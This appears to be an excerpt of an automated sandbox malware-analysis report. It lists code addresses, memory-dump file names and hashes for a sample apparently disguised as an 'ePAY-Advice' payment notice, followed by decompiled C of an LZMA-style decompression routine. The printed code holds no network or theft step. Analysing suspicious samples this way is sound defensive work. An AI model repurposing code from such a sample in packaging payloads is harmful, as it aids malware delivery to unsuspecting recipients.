0x00406795
0x00406795
0x0040679d
0x004067a2
0x004067a4
0x004067a6
0x004067a6
0x004067c0
0x004067c7
0x004067ca
0x00000000
0x004067cc
0x00000000
0x004067cc
0x004067ca
0x004067d1
0x004067d1
0x004067d1
0x004067d1
0x00000000
0x00000000
0x0040680c
0x0040680c
0x00406810
0x00406e18
0x00000000
0x00406e18
0x00406816
0x00406819
0x0040681c
0x00406820
0x00406823
0x00406829
0x0040682b
0x0040682b
0x0040682b
0x0040682e
0x00406831
0x00406831
0x00406837
0x004067d5
0x004067d5
0x004067d8
0x00000000
0x004067d8
0x00406839
0x00406839
0x0040683c
0x0040683f
0x00406842
0x00406845
0x00406848
0x0040684b
0x0040684e
0x00406851
0x00406854
0x00406857
0x0040686f
0x00406872
0x00406875
0x00406878
0x00406878
0x0040687b
0x0040687f
0x00406881
0x00406859
0x00406859
0x00406861
0x00406866
0x00406868
0x0040686a
0x0040686a
0x00406884
0x0040688b
0x0040688e
0x00000000
0x00406890
0x00000000
0x00406890
0x00000000
0x00406b1d
0x00406b1d
0x00406b21
0x00406e48
0x00000000
0x00406e48
0x00406b27
0x00406b2a
0x00406b2d
0x00406b31
0x00406b34
0x00406b3a
0x00406b3c
0x00406b3c
0x00406b3c
0x00406b3f
0x00000000
0x00000000
0x00000000
0x00000000
0x00406c2c
0x00406c30
0x00406c52
0x00406c55
0x00406c5f
0x00000000
0x00406c5f
0x00406c32
0x00406c35
0x00406c39
0x00406c3c
0x00406c3c
0x00406c3f
0x00000000
0x00000000
0x00406ce9
0x00406ced
0x00406d0b
0x00406d0b
0x00406d0b
0x00406d12
0x00406d19
0x00406d20
0x00406d20
0x00000000
0x00406d20
0x00406cef
0x00406cf2
0x00406cf5
0x00406cf8
0x00406cff
0x00406c43
0x00406c43
0x00406c46
0x00000000
0x00000000
0x00406dda
0x00406ddd
0x00000000
0x00000000
0x00406a14
0x00406a16
0x00406a1d
0x00406a1e
0x00406a20
0x00406a23
0x00000000
0x00000000
0x00406a2b
0x00406a2e
0x00406a31
0x00406a33
0x00406a35
0x00406a35
0x00406a36
0x00406a39
0x00406a40
0x00406a43
0x00406a51
0x00000000
0x00000000
0x00406d27
0x00406d27
0x00406d2a
0x00406d31
0x00000000
0x00000000
0x00406d36
0x00406d36
0x00406d3a
0x00406e72
0x00000000
0x00406e72
0x00406d40
0x00406d43
0x00406d46
0x00406d4a
0x00406d4d
0x00406d53
0x00406d55
0x00406d55
0x00406d55
0x00406d58
0x00406d5b
0x00406d5b
0x00406d5b
0x00406d5b
0x00406d5e
0x00406d5e
0x00406d62
0x00406dc2
0x00406dc5
0x00406dca
0x00406dcb
0x00406dcd
0x00406dcf
0x00406dd2
0x00000000
0x00406dd2
0x00406d64
0x00406d6a
0x00406d6d
0x00406d70
0x00406d73
0x00406d76
0x00406d79
0x00406d7c
0x00406d7f
0x00406d82
0x00406d85
0x00406d9e
0x00406da1
0x00406da4
0x00406da7
0x00406dab
0x00406dad
0x00406dad
0x00406dae
0x00406db1
0x00406d87
0x00406d87
0x00406d8f
0x00406d94
0x00406d96
0x00406d99
0x00406d99
0x00406db4
0x00406dbb
0x00000000
0x00406dbd
0x00000000
0x00406dbd
0x00000000
0x00406a59
0x00406a5c
0x00406a92
0x00406bc2
0x00406bc2
0x00406bc2
0x00406bc2
0x00406bc5
0x00406bc5
0x00406bc8
0x00406bca
0x00406e54
0x00000000
0x00406e54
0x00406bd0
0x00406bd3
0x00000000
0x00000000
0x00406bd9
0x00406bdd
0x00406be0
0x00406be0
0x00406be0
0x00000000
0x00406be0
0x00406a5e
0x00406a60
0x00406a62
0x00406a64
0x00406a67
0x00406a68
0x00406a6a
0x00406a6c
0x00406a6f
0x00406a72
0x00406a88
0x00406a8d
0x00406ac5
0x00406ac5
0x00406ac9
0x00406af5
0x00406af7
0x00406afe
0x00406b01
0x00406b04
0x00406b04
0x00406b09
0x00406b09
0x00406b0b
0x00406b0e
0x00406b15
0x00406b18
0x00406b45
0x00406b45
0x00406b48
0x00406b4b
0x00406bbf
0x00406bbf
0x00406bbf
0x00000000
0x00406bbf
0x00406b4d
0x00406b53
0x00406b56
0x00406b59
0x00406b5c
0x00406b5f
0x00406b62
0x00406b65
0x00406b68
0x00406b6b
0x00406b6e
0x00406b87
0x00406b89
0x00406b8c
0x00406b8d
0x00406b90
0x00406b92
0x00406b95
0x00406b97
0x00406b99
0x00406b9c
0x00406b9e
0x00406ba1
0x00406ba5
0x00406ba7
0x00406ba7
0x00406ba8
0x00406bab
0x00406bae
0x00406b70
0x00406b70
0x00406b78
0x00406b7d
0x00406b7f
0x00406b82
0x00406b82
0x00406bb1
0x00406bb8
0x00406b42
0x00406b42
0x00406b42
0x00406b42
0x00000000
0x00406bba
0x00000000
0x00406bba
0x00406bb8
0x00406acb
0x00406ace
0x00406ad0
0x00406ad3
0x00406ad6
0x00406ad9
0x00406adb
0x00406ade
0x00406ae1
0x00406ae1
0x00406ae4
0x00406ae4
0x00406ae7
0x00406aee
0x00406ac2
0x00406ac2
0x00406ac2
0x00406ac2
0x00000000
0x00406af0
0x00000000
0x00406af0
0x00406aee
0x00406a74
0x00406a77
0x00406a79
0x00406a7c
0x00000000
0x00000000
0x004067db
0x004067db
0x004067df
0x00406e24
0x00000000
0x00406e24
0x004067e5
0x004067e8
0x004067eb
0x004067ee
0x004067f1
0x004067f4
0x004067f7
0x004067f9
0x004067fc
0x004067ff
0x00406802
0x00406804
0x00406804
0x00406804
0x00000000
0x00000000
0x00000000
0x00000000
0x00406be3
0x00406be3
0x00406be3
0x00406be7
0x00000000
0x00000000
0x00406bed
0x00406bf0
0x00406bf3
0x00406bf6
0x00406bf8
0x00406bf8
0x00406bf8
0x00406bfb
0x00406bfe
0x00406c01
0x00406c04
0x00406c07
0x00406c0a
0x00406c0b
0x00406c0d
0x00406c0d
0x00406c0d
0x00406c10
0x00406c13
0x00406c16
0x00406c19
0x00406c1c
0x00406c20
0x00406c22
0x00406c25
0x00000000
0x00406c27
0x00000000
0x00406c27
0x00406c25
0x00406e5a
0x00000000
0x00000000
0x00406489

Memory Dump Source

Source File: 00000000.00000002.823850662.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.823844110.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823867737.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823874727.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823874727.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823874727.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823874727.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823874727.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823922822.0000000000436000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823922822.000000000043A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823922822.000000000043F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ePAY-Advice_Rf[UC7749879100].jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7fc8b0fe229dbff43726b3aa98382c4509895189392f9f8db1d3ee082f796570
Instruction ID: 583e61d198cc77022754fa770bf55cdcc509db116518bb017f27c6a68360c261
Opcode Fuzzy Hash: 7fc8b0fe229dbff43726b3aa98382c4509895189392f9f8db1d3ee082f796570
Instruction Fuzzy Hash: B9814471D04229DBDF24CFA8C884BADBBB1FF44305F25816AD446BB281C7389A96DF54

Uniqueness

Uniqueness Score: -1.00%

Function 00406447 Relevance: 5.2, APIs: 4, Instructions: 198
COMMON

Download Yara Rule

C-Code - Quality: 98%

			E00406447(void* __ecx) {
				void* _v8;
				void* _v12;
				signed int _v16;
				unsigned int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v95;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				signed int _v120;
				intOrPtr _v124;
				signed int _v128;
				signed int _v132;
				signed int _v136;
				void _v140;
				void* _v148;
				signed int _t537;
				signed int _t538;
				signed int _t572;

				_t572 = 0x22;
				_v148 = __ecx;
				memcpy( &_v140, __ecx, _t572 << 2);
				if(_v52 == 0xffffffff) {
					return 1;
				}
				while(1) {
					L3:
					_t537 = _v140;
					if(_t537 > 0x1c) {
						break;
					}
					switch( *((intOrPtr*)(_t537 * 4 +  &M00406E99))) {
						case 0:
							__eflags = _v112;
							if(_v112 == 0) {
								goto L173;
							}
							_v112 = _v112 - 1;
							_v116 = _v116 + 1;
							_t537 =  *_v116;
							__eflags = _t537 - 0xe1;
							if(_t537 > 0xe1) {
								goto L174;
							}
							_t542 = _t537 & 0x000000ff;
							_push(0x2d);
							asm("cdq");
							_pop(_t576);
							_push(9);
							_pop(_t577);
							_t622 = _t542 / _t576;
							_t544 = _t542 % _t576 & 0x000000ff;
							asm("cdq");
							_t617 = _t544 % _t577 & 0x000000ff;
							_v64 = _t617;
							_v32 = (1 << _t622) - 1;
							_v28 = (1 << _t544 / _t577) - 1;
							_t625 = (0x300 << _t617 + _t622) + 0x736;
							__eflags = 0x600 - _v124;
							if(0x600 == _v124) {
								L12:
								__eflags = _t625;
								if(_t625 == 0) {
									L14:
									_v76 = _v76 & 0x00000000;
									_v68 = _v68 & 0x00000000;
									goto L17;
								} else {
									goto L13;
								}
								do {
									L13:
									_t625 = _t625 - 1;
									__eflags = _t625;
									 *((short*)(_v8 + _t625 * 2)) = 0x400;
								} while (_t625 != 0);
								goto L14;
							}
							__eflags = _v8;
							if(_v8 != 0) {
								GlobalFree(_v8);
							}
							_t537 = GlobalAlloc(0x40, 0x600); // executed
							__eflags = _t537;
							_v8 = _t537;
							if(_t537 == 0) {
								goto L174;
							} else {
								_v124 = 0x600;
								goto L12;
							}
						case 1:
							L15:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 1;
								goto L173;
							}
							_v112 = _v112 - 1;
							_v68 = _v68 | ( *_v116 & 0x000000ff) << _v76 << 0x00000003;
							_v116 = _v116 + 1;
							_t50 =  &_v76;
							 *_t50 = _v76 + 1;
							__eflags =  *_t50;
							L17:
							__eflags = _v76 - 4;
							if(_v76 < 4) {
								goto L15;
							}
							_t550 = _v68;
							__eflags = _t550 - _v120;
							if(_t550 == _v120) {
								L22:
								_v76 = 5;
								 *(_v12 + _v120 - 1) =  *(_v12 + _v120 - 1) & 0x00000000;
								goto L25;
							}
							__eflags = _v12;
							_v120 = _t550;
							if(_v12 != 0) {
								GlobalFree(_v12); // executed
							}
							_t537 = GlobalAlloc(0x40, _v68); // executed
							__eflags = _t537;
							_v12 = _t537;
							if(_t537 == 0) {
								goto L174;
							} else {
								goto L22;
							}
						case 2:
							L26:
							_t557 = _v100 & _v32;
							_v136 = 6;
							_v80 = _t557;
							_t626 = _v8 + ((_v60 << 4) + _t557) * 2;
							goto L135;
						case 3:
							L23:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 3;
								goto L173;
							}
							_v112 = _v112 - 1;
							_t72 =  &_v116;
							 *_t72 = _v116 + 1;
							__eflags =  *_t72;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							L25:
							_v76 = _v76 - 1;
							__eflags = _v76;
							if(_v76 != 0) {
								goto L23;
							}
							goto L26;
						case 4:
							L136:
							_t559 =  *_t626;
							_t610 = _t559 & 0x0000ffff;
							_t591 = (_v20 >> 0xb) * _t610;
							__eflags = _v16 - _t591;
							if(_v16 >= _t591) {
								_v20 = _v20 - _t591;
								_v16 = _v16 - _t591;
								_v68 = 1;
								_t560 = _t559 - (_t559 >> 5);
								__eflags = _t560;
								 *_t626 = _t560;
							} else {
								_v20 = _t591;
								_v68 = _v68 & 0x00000000;
								 *_t626 = (0x800 - _t610 >> 5) + _t559;
							}
							__eflags = _v20 - 0x1000000;
							if(_v20 >= 0x1000000) {
								goto L142;
							} else {
								goto L140;
							}
						case 5:
							L140:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 5;
								goto L173;
							}
							_v20 = _v20 << 8;
							_v112 = _v112 - 1;
							_t464 =  &_v116;
							 *_t464 = _v116 + 1;
							__eflags =  *_t464;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							L142:
							_t561 = _v136;
							goto L143;
						case 6:
							__edx = 0;
							__eflags = _v68;
							if(_v68 != 0) {
								__eax = _v8;
								__ecx = _v60;
								_v56 = 1;
								_v136 = 7;
								__esi = _v8 + 0x180 + _v60 * 2;
								goto L135;
							}
							__eax = _v96 & 0x000000ff;
							__esi = _v100;
							__cl = 8;
							__cl = 8 - _v64;
							__esi = _v100 & _v28;
							__eax = (_v96 & 0x000000ff) >> 8;
							__ecx = _v64;
							__esi = (_v100 & _v28) << 8;
							__ecx = _v8;
							((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) = ((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) + (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8)) * 2;
							__eax = ((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) + (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8)) * 2 << 9;
							__eflags = _v60 - 4;
							__eax = (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) + (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8)) * 2 << 9) + _v8 + 0xe6c;
							_v92 = (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) + (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8)) * 2 << 9) + _v8 + 0xe6c;
							if(_v60 >= 4) {
								__eflags = _v60 - 0xa;
								if(_v60 >= 0xa) {
									_t103 =  &_v60;
									 *_t103 = _v60 - 6;
									__eflags =  *_t103;
								} else {
									_v60 = _v60 - 3;
								}
							} else {
								_v60 = 0;
							}
							__eflags = _v56 - __edx;
							if(_v56 == __edx) {
								__ebx = 0;
								__ebx = 1;
								goto L63;
							}
							__eax = _v24;
							__eax = _v24 - _v48;
							__eflags = __eax - _v120;
							if(__eax >= _v120) {
								__eax = __eax + _v120;
								__eflags = __eax;
							}
							__ecx = _v12;
							__ebx = 0;
							__ebx = 1;
							__al =  *((intOrPtr*)(__eax + __ecx));
							_v95 =  *((intOrPtr*)(__eax + __ecx));
							goto L43;
						case 7:
							__eflags = _v68 - 1;
							if(_v68 != 1) {
								__eax = _v40;
								_v132 = 0x16;
								_v36 = _v40;
								__eax = _v44;
								_v40 = _v44;
								__eax = _v48;
								_v44 = _v48;
								__eax = 0;
								__eflags = _v60 - 7;
								0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
								__al = __al & 0x000000fd;
								__eax = (__eflags >= 0) - 1 + 0xa;
								_v60 = (__eflags >= 0) - 1 + 0xa;
								__eax = _v8;
								__eax = _v8 + 0x664;
								__eflags = __eax;
								_v92 = __eax;
								goto L71;
							}
							__eax = _v8;
							__ecx = _v60;
							_v136 = 8;
							__esi = _v8 + 0x198 + _v60 * 2;
							goto L135;
						case 8:
							__eflags = _v68;
							if(_v68 != 0) {
								__eax = _v8;
								__ecx = _v60;
								_v136 = 0xa;
								__esi = _v8 + 0x1b0 + _v60 * 2;
							} else {
								__eax = _v60;
								__ecx = _v8;
								__eax = _v60 + 0xf;
								_v136 = 9;
								_v60 + 0xf << 4 = (_v60 + 0xf << 4) + _v80;
								__esi = _v8 + ((_v60 + 0xf << 4) + _v80) * 2;
							}
							goto L135;
						case 9:
							__eflags = _v68;
							if(_v68 != 0) {
								goto L92;
							}
							__eflags = _v100;
							if(_v100 == 0) {
								goto L174;
							}
							__eax = 0;
							__eflags = _v60 - 7;
							_t264 = _v60 - 7 >= 0;
							__eflags = _t264;
							0 | _t264 = _t264 + _t264 + 9;
							_v60 = _t264 + _t264 + 9;
							goto L78;
						case 0xa:
							__eflags = _v68;
							if(_v68 != 0) {
								__eax = _v8;
								__ecx = _v60;
								_v136 = 0xb;
								__esi = _v8 + 0x1c8 + _v60 * 2;
								goto L135;
							}
							__eax = _v44;
							goto L91;
						case 0xb:
							__eflags = _v68;
							if(_v68 != 0) {
								__ecx = _v40;
								__eax = _v36;
								_v36 = _v40;
							} else {
								__eax = _v40;
							}
							__ecx = _v44;
							_v40 = _v44;
							L91:
							__ecx = _v48;
							_v48 = __eax;
							_v44 = _v48;
							L92:
							__eax = _v8;
							_v132 = 0x15;
							__eax = _v8 + 0xa68;
							_v92 = _v8 + 0xa68;
							goto L71;
						case 0xc:
							L102:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 0xc;
								goto L173;
							}
							__ecx = _v116;
							__eax = _v16;
							_v20 = _v20 << 8;
							__ecx =  *_v116 & 0x000000ff;
							_v112 = _v112 - 1;
							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							_t340 =  &_v116;
							 *_t340 = _v116 + 1;
							__eflags =  *_t340;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							__eax = _v48;
							goto L104;
						case 0xd:
							L39:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 0xd;
								goto L173;
							}
							__ecx = _v116;
							__eax = _v16;
							_v20 = _v20 << 8;
							__ecx =  *_v116 & 0x000000ff;
							_v112 = _v112 - 1;
							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							_t127 =  &_v116;
							 *_t127 = _v116 + 1;
							__eflags =  *_t127;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							L41:
							__eax = _v68;
							__eflags = _v76 - _v68;
							if(_v76 != _v68) {
								goto L50;
							}
							__eflags = __ebx - 0x100;
							if(__ebx >= 0x100) {
								goto L56;
							}
							L43:
							__eax = _v95 & 0x000000ff;
							_v95 = _v95 << 1;
							__ecx = _v92;
							__eax = (_v95 & 0x000000ff) >> 7;
							_v76 = __eax;
							__eax = __eax + 1;
							__eax = __eax << 8;
							__eax = __eax + __ebx;
							__esi = _v92 + __eax * 2;
							_v20 = _v20 >> 0xb;
							__ax =  *__esi;
							_v88 = __esi;
							__edx = __ax & 0x0000ffff;
							__ecx = (_v20 >> 0xb) * __edx;
							__eflags = _v16 - __ecx;
							if(_v16 >= __ecx) {
								_v20 = _v20 - __ecx;
								_v16 = _v16 - __ecx;
								__cx = __ax;
								_v68 = 1;
								__cx = __ax >> 5;
								__eflags = __eax;
								__ebx = __ebx + __ebx + 1;
								 *__esi = __ax;
							} else {
								_v68 = _v68 & 0x00000000;
								_v20 = __ecx;
								0x800 = 0x800 - __edx;
								0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
								__ebx = __ebx + __ebx;
								 *__esi = __cx;
							}
							__eflags = _v20 - 0x1000000;
							_v72 = __ebx;
							if(_v20 >= 0x1000000) {
								goto L41;
							} else {
								goto L39;
							}
						case 0xe:
							L48:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 0xe;
								goto L173;
							}
							__ecx = _v116;
							__eax = _v16;
							_v20 = _v20 << 8;
							__ecx =  *_v116 & 0x000000ff;
							_v112 = _v112 - 1;
							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							_t161 =  &_v116;
							 *_t161 = _v116 + 1;
							__eflags =  *_t161;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							while(1) {
								L50:
								__eflags = __ebx - 0x100;
								if(__ebx >= 0x100) {
									break;
								}
								__eax = _v92;
								__edx = __ebx + __ebx;
								__ecx = _v20;
								__esi = __edx + __eax;
								__ecx = _v20 >> 0xb;
								__ax =  *__esi;
								_v88 = __esi;
								__edi = __ax & 0x0000ffff;
								__ecx = (_v20 >> 0xb) * __edi;
								__eflags = _v16 - __ecx;
								if(_v16 >= __ecx) {
									_v20 = _v20 - __ecx;
									_v16 = _v16 - __ecx;
									__cx = __ax;
									_t175 = __edx + 1; // 0x1
									__ebx = _t175;
									__cx = __ax >> 5;
									__eflags = __eax;
									 *__esi = __ax;
								} else {
									_v20 = __ecx;
									0x800 = 0x800 - __edi;
									0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
									__ebx = __ebx + __ebx;
									 *__esi = __cx;
								}
								__eflags = _v20 - 0x1000000;
								_v72 = __ebx;
								if(_v20 >= 0x1000000) {
									continue;
								} else {
									goto L48;
								}
							}
							L56:
							_t178 =  &_v56;
							 *_t178 = _v56 & 0x00000000;
							__eflags =  *_t178;
							goto L57;
						case 0xf:
							L60:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 0xf;
								goto L173;
							}
							__ecx = _v116;
							__eax = _v16;
							_v20 = _v20 << 8;
							__ecx =  *_v116 & 0x000000ff;
							_v112 = _v112 - 1;
							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							_t208 =  &_v116;
							 *_t208 = _v116 + 1;
							__eflags =  *_t208;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							L62:
							__eflags = __ebx - 0x100;
							if(__ebx >= 0x100) {
								L57:
								__al = _v72;
								_v96 = _v72;
								goto L58;
							}
							L63:
							__eax = _v92;
							__edx = __ebx + __ebx;
							__ecx = _v20;
							__esi = __edx + __eax;
							__ecx = _v20 >> 0xb;
							__ax =  *__esi;
							_v88 = __esi;
							__edi = __ax & 0x0000ffff;
							__ecx = (_v20 >> 0xb) * __edi;
							__eflags = _v16 - __ecx;
							if(_v16 >= __ecx) {
								_v20 = _v20 - __ecx;
								_v16 = _v16 - __ecx;
								__cx = __ax;
								_t222 = __edx + 1; // 0x1
								__ebx = _t222;
								__cx = __ax >> 5;
								__eflags = __eax;
								 *__esi = __ax;
							} else {
								_v20 = __ecx;
								0x800 = 0x800 - __edi;
								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
								__ebx = __ebx + __ebx;
								 *__esi = __cx;
							}
							__eflags = _v20 - 0x1000000;
							_v72 = __ebx;
							if(_v20 >= 0x1000000) {
								goto L62;
							} else {
								goto L60;
							}
						case 0x10:
							L112:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 0x10;
								goto L173;
							}
							__ecx = _v116;
							__eax = _v16;
							_v20 = _v20 << 8;
							__ecx =  *_v116 & 0x000000ff;
							_v112 = _v112 - 1;
							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							_t371 =  &_v116;
							 *_t371 = _v116 + 1;
							__eflags =  *_t371;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							goto L114;
						case 0x11:
							L71:
							__esi = _v92;
							_v136 = 0x12;
							goto L135;
						case 0x12:
							__eflags = _v68;
							if(_v68 != 0) {
								__eax = _v92;
								_v136 = 0x13;
								__esi = _v92 + 2;
								L135:
								_v88 = _t626;
								goto L136;
							}
							__eax = _v80;
							_v52 = _v52 & 0x00000000;
							__ecx = _v92;
							__eax = _v80 << 4;
							__eflags = __eax;
							__eax = _v92 + __eax + 4;
							goto L133;
						case 0x13:
							__eflags = _v68;
							if(_v68 != 0) {
								_t475 =  &_v92;
								 *_t475 = _v92 + 0x204;
								__eflags =  *_t475;
								_v52 = 0x10;
								_v68 = 8;
								L147:
								_v128 = 0x14;
								goto L148;
							}
							__eax = _v80;
							__ecx = _v92;
							__eax = _v80 << 4;
							_v52 = 8;
							__eax = _v92 + (_v80 << 4) + 0x104;
							L133:
							_v92 = __eax;
							_v68 = 3;
							goto L147;
						case 0x14:
							_v52 = _v52 + __ebx;
							__eax = _v132;
							goto L143;
						case 0x15:
							__eax = 0;
							__eflags = _v60 - 7;
							0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
							__al = __al & 0x000000fd;
							__eax = (__eflags >= 0) - 1 + 0xb;
							_v60 = (__eflags >= 0) - 1 + 0xb;
							goto L123;
						case 0x16:
							__eax = _v52;
							__eflags = __eax - 4;
							if(__eax >= 4) {
								_push(3);
								_pop(__eax);
							}
							__ecx = _v8;
							_v68 = 6;
							__eax = __eax << 7;
							_v128 = 0x19;
							_v92 = __eax;
							goto L148;
						case 0x17:
							L148:
							__eax = _v68;
							_v84 = 1;
							_v76 = _v68;
							goto L152;
						case 0x18:
							L149:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 0x18;
								goto L173;
							}
							__ecx = _v116;
							__eax = _v16;
							_v20 = _v20 << 8;
							__ecx =  *_v116 & 0x000000ff;
							_v112 = _v112 - 1;
							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							_t490 =  &_v116;
							 *_t490 = _v116 + 1;
							__eflags =  *_t490;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							L151:
							_t493 =  &_v76;
							 *_t493 = _v76 - 1;
							__eflags =  *_t493;
							L152:
							__eflags = _v76;
							if(_v76 <= 0) {
								__ecx = _v68;
								__ebx = _v84;
								0 = 1;
								__eax = 1 << __cl;
								__ebx = _v84 - (1 << __cl);
								__eax = _v128;
								_v72 = __ebx;
								L143:
								_v140 = _t561;
								goto L3;
							}
							__eax = _v84;
							_v20 = _v20 >> 0xb;
							__edx = _v84 + _v84;
							__eax = _v92;
							__esi = __edx + __eax;
							_v88 = __esi;
							__ax =  *__esi;
							__edi = __ax & 0x0000ffff;
							__ecx = (_v20 >> 0xb) * __edi;
							__eflags = _v16 - __ecx;
							if(_v16 >= __ecx) {
								_v20 = _v20 - __ecx;
								_v16 = _v16 - __ecx;
								__cx = __ax;
								__cx = __ax >> 5;
								__eax = __eax - __ecx;
								__edx = __edx + 1;
								__eflags = __edx;
								 *__esi = __ax;
								_v84 = __edx;
							} else {
								_v20 = __ecx;
								0x800 = 0x800 - __edi;
								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
								_v84 = _v84 << 1;
								 *__esi = __cx;
							}
							__eflags = _v20 - 0x1000000;
							if(_v20 >= 0x1000000) {
								goto L151;
							} else {
								goto L149;
							}
						case 0x19:
							__eflags = __ebx - 4;
							if(__ebx < 4) {
								_v48 = __ebx;
								L122:
								_t399 =  &_v48;
								 *_t399 = _v48 + 1;
								__eflags =  *_t399;
								L123:
								__eax = _v48;
								__eflags = __eax;
								if(__eax == 0) {
									_v52 = _v52 | 0xffffffff;
									goto L173;
								}
								__eflags = __eax - _v100;
								if(__eax > _v100) {
									goto L174;
								}
								_v52 = _v52 + 2;
								__eax = _v52;
								_t406 =  &_v100;
								 *_t406 = _v100 + _v52;
								__eflags =  *_t406;
								goto L126;
							}
							__ecx = __ebx;
							__eax = __ebx;
							__ecx = __ebx >> 1;
							__eax = __ebx & 0x00000001;
							__ecx = (__ebx >> 1) - 1;
							__al = __al | 0x00000002;
							__eax = (__ebx & 0x00000001) << __cl;
							__eflags = __ebx - 0xe;
							_v48 = __eax;
							if(__ebx >= 0xe) {
								__ebx = 0;
								_v76 = __ecx;
								L105:
								__eflags = _v76;
								if(_v76 <= 0) {
									__eax = __eax + __ebx;
									_v68 = 4;
									_v48 = __eax;
									__eax = _v8;
									__eax = _v8 + 0x644;
									__eflags = __eax;
									L111:
									__ebx = 0;
									_v92 = __eax;
									_v84 = 1;
									_v72 = 0;
									_v76 = 0;
									L115:
									__eax = _v68;
									__eflags = _v76 - _v68;
									if(_v76 >= _v68) {
										_t397 =  &_v48;
										 *_t397 = _v48 + __ebx;
										__eflags =  *_t397;
										goto L122;
									}
									__eax = _v84;
									_v20 = _v20 >> 0xb;
									__edi = _v84 + _v84;
									__eax = _v92;
									__esi = __edi + __eax;
									_v88 = __esi;
									__ax =  *__esi;
									__ecx = __ax & 0x0000ffff;
									__edx = (_v20 >> 0xb) * __ecx;
									__eflags = _v16 - __edx;
									if(_v16 >= __edx) {
										__ecx = 0;
										_v20 = _v20 - __edx;
										__ecx = 1;
										_v16 = _v16 - __edx;
										__ebx = 1;
										__ecx = _v76;
										__ebx = 1 << __cl;
										__ecx = 1 << __cl;
										__ebx = _v72;
										__ebx = _v72 | __ecx;
										__cx = __ax;
										__cx = __ax >> 5;
										__eax = __eax - __ecx;
										__edi = __edi + 1;
										__eflags = __edi;
										_v72 = __ebx;
										 *__esi = __ax;
										_v84 = __edi;
									} else {
										_v20 = __edx;
										0x800 = 0x800 - __ecx;
										0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
										_v84 = _v84 << 1;
										 *__esi = __dx;
									}
									__eflags = _v20 - 0x1000000;
									if(_v20 >= 0x1000000) {
										L114:
										_t374 =  &_v76;
										 *_t374 = _v76 + 1;
										__eflags =  *_t374;
										goto L115;
									} else {
										goto L112;
									}
								}
								__ecx = _v16;
								__ebx = __ebx + __ebx;
								_v20 = _v20 >> 1;
								__eflags = _v16 - _v20;
								_v72 = __ebx;
								if(_v16 >= _v20) {
									__ecx = _v20;
									_v16 = _v16 - _v20;
									__ebx = __ebx | 0x00000001;
									__eflags = __ebx;
									_v72 = __ebx;
								}
								__eflags = _v20 - 0x1000000;
								if(_v20 >= 0x1000000) {
									L104:
									_t344 =  &_v76;
									 *_t344 = _v76 - 1;
									__eflags =  *_t344;
									goto L105;
								} else {
									goto L102;
								}
							}
							__edx = _v8;
							__eax = __eax - __ebx;
							_v68 = __ecx;
							__eax = _v8 + 0x55e + __eax * 2;
							goto L111;
